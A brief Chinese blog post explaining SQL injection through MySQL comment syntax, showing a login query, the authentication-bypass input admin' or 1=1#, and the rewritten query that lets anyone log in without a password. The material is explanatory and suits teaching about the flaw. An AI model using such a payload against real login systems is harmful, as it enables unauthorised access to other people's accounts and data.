0
点赞
收藏
分享

微信扫一扫

SQL注入之注释


//  这里以MySQL为例子
select name,pass from tbAdmin where name='admin' and pass='123456'

输入:admin' or 1=1#


SQL变成下面这个样子:


select name,pass from tbAdmin where name='admin' or 1=1#' and pass='123456' 


你会发现随便输入密码,都可以随便登陆了。。。


-----------------------------------------------------
select * from tbAdmin # 这是MySQL注释
select * from tbAdmin /* 这是MySQL注释 */

举报

相关推荐

0 条评论